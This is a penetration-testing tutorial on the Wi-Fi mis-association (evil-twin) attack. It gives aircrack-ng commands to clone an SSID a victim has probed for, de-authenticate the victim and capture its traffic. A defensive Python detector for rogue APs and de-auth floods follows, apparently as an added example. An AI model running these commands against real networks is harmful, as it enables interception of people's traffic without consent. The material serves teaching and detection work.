The mis-association attack technique gets a computer to connect to your Kali machine using one of the wireless networks it has connected to before, or by using the same SSID as a network that is available and has some clients. For example, if a computer was connected to a Wi-Fi network called "Public-wifi" in the past, that name will be discovered and used to attack the host.
The steps are as follows:
- Find one of the wireless SSID names that the victim has connected to before, using "airodump-ng"
- Set up a new access point with exactly the same name
- Send a de-auth message to the victim so it will be disconnected from the current AP and try to connect again
- As the SSID you created is already on the victim's list, it will connect to the AP you created.
- You can start capturing the victim's traffic!
To achieve this, the following steps need to be followed:
- airmon-ng start wlan0
- airodump-ng mon0 -- You can see that the station is trying to connect to a list of APs that it has connected to before (probe column), e.g. Public-wifi
Note: make sure that SSID is not available on the current list of APs
- airbase-ng --essid "Public-wifi" -c 1 mon0 -- This will make Kali an access point, and the client can authenticate and connect
- Set up DHCP and other settings as per the previous section (Rogue access points)
- Now the client station will try to connect to your computer, as it has the same SSID in its database
- If the client machine is already connected to another Wi-Fi network, start a de-auth attack as below
- aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0 -- Force clients to reauthenticate and connect to our machine
- Monitor the output of the airbase-ng command to see when the victim connects
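Seen from the monitoring side, the steps above leave three traces: an open AP that starts beaconing an SSID a client had only probed for, a sanctioned SSID announced by an unknown BSSID, and a burst of de-auth frames against one AP. The Python sketch below is an added example, not part of the original post; the event records, AP inventory, thresholds and MAC addresses are constructed assumptions and not the output format of any tool.

```python
from collections import defaultdict, deque

# Assumed inventory of sanctioned APs (constructed): SSID -> {BSSID: encryption}
AUTHORIZED = {"Corp-wifi": {"aa:bb:cc:00:00:01": "WPA2"}}
DEAUTH_THRESHOLD = 10  # de-auth frames against one BSSID ...
DEAUTH_WINDOW = 5.0    # ... within this many seconds counts as a flood

def detect(events, authorized=AUTHORIZED):
    """Return (rule, ssid, bssid) alerts for traces of a mis-association attempt."""
    alerts, probed, seen, flooding = [], set(), set(), set()
    deauths = defaultdict(deque)  # bssid -> timestamps of recent de-auth frames
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "probe":
            probed.add(ev["ssid"])  # SSID leaked from a client's saved-network list
        elif ev["type"] == "beacon":
            key = (ev["ssid"], ev["bssid"])
            if key in seen:
                continue  # each SSID/BSSID pair is evaluated once
            seen.add(key)
            known = authorized.get(ev["ssid"])
            if known is None:
                # Open AP first seen only after a client probed for that SSID
                if ev["ssid"] in probed and ev["enc"] == "OPN":
                    alerts.append(("probe_answered", ev["ssid"], ev["bssid"]))
            elif ev["bssid"] not in known:
                alerts.append(("unknown_bssid", ev["ssid"], ev["bssid"]))
            elif ev["enc"] != known[ev["bssid"]]:
                alerts.append(("enc_mismatch", ev["ssid"], ev["bssid"]))
        elif ev["type"] == "deauth":
            q = deauths[ev["bssid"]]
            q.append(ev["t"])
            while q[0] < ev["t"] - DEAUTH_WINDOW:
                q.popleft()  # drop frames that fell out of the window
            if len(q) >= DEAUTH_THRESHOLD and ev["bssid"] not in flooding:
                flooding.add(ev["bssid"])
                alerts.append(("deauth_flood", None, ev["bssid"]))
    return alerts

# Constructed sample events (not captured traffic)
SAMPLE = [
    {"t": 0, "type": "beacon", "ssid": "Corp-wifi", "bssid": "aa:bb:cc:00:00:01", "enc": "WPA2"},
    {"t": 2, "type": "probe", "client": "02:00:00:00:00:10", "ssid": "Public-wifi"},
    {"t": 10, "type": "beacon", "ssid": "Public-wifi", "bssid": "02:00:00:00:00:99", "enc": "OPN"},
    {"t": 12, "type": "beacon", "ssid": "Corp-wifi", "bssid": "02:00:00:00:00:99", "enc": "OPN"},
] + [{"t": 20 + i * 0.25, "type": "deauth", "bssid": "aa:bb:cc:00:00:01"} for i in range(12)]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The "probe_answered" rule is a heuristic: a legitimate open network that comes into range after a client probes for it will also match, so it is best correlated with the other two alerts.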